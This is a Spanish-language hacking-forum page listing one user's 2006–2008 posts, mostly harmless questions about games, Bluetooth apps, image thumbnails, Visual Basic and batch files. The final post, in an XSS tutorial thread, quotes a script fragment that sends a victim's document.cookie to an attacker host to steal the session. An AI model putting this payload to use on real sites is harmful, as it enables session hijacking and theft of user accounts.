elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Media / Juegos y Consolas / Jugar AOE por Internet en: 5 Julio 2008, 03:29 am
Hola tengo el age of empires II y el otro dia un cuate me dijo para retarlo pero no tengo ni la menor idea de como poder jugar con el via internet por cierto mi juego no es original.
12  Comunicaciones / Hacking Mobile / Re: [Bluetooth] Programa Bt Info (Controlar Cell Via Bluetooth) en: 4 Mayo 2008, 21:42 pm
hola dscu,lpen pero tengo una pequeña duda tengo mi cell SE Z310i y segun se sabe la aplicacion  funcioan de maravilla pero cuando lo inicio entra en el menu de idioma y no puedo hacer nada solo ahi me quedo no se si a alguien tambien le paso.
13  Media / Diseño Gráfico / Re: Extraer thumbnail en: 28 Septiembre 2007, 23:12 pm
zorry no quiero hacer spam pero a lo que me refiero es a esto:
http://comunidad.uem.es/epuertas/post/2006/06/22/fotos-con-informacion-oculta
14  Media / Diseño Gráfico / Re: Extraer thumbnail en: 28 Septiembre 2007, 22:02 pm
Por ahi lei que las imagenes guarda un thumbnail y que ese thumbnail se puede extraer.
15  Media / Diseño Gráfico / Extraer thumbnail en: 28 Septiembre 2007, 21:47 pm
Hola alguien sabe como puedo extraer el thumbnail de una imagen?
16  Programación / Programación Visual Basic / [VB] Ayuda Manejo Portapapeles(ClipBoard) en: 18 Septiembre 2007, 02:09 am
Hola disculpen quisiera un poco de ayuda sobre el mnejo del portapapeles en visual basic 6 por ejemplo quisiera saber como puedo copiar un archivo al portapapeles.
17  Programación / Programación Visual Basic / Re: EDITAR HOST ? en: 13 Septiembre 2007, 21:29 pm
Creo QUE se refire al archivo host ubicado en:
Citar
C:\WINDOWS\system32\drivers\etc
el que asigna la ip a los dominios.
18  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 3 Julio 2007, 10:30 am
alguien sabe como aumentar la ventana de ms-dos a fullscreen
pero con codigo xq desde propiedades si se puede

Desde predeterminados
gracias pero yo kisiera hacerlo con un bat osea en code.
19  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 6 Diciembre 2006, 00:05 am
alguien sabe como aumentar la ventana de ms-dos a fullscreen
pero con codigo xq desde propiedades si se puede
20  Informática / Tutoriales - Documentación / Re: [::Tutorial::] - Ataques XSS en: 6 Diciembre 2006, 00:03 am
y si yo le paaso solo el enlace:
Código:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines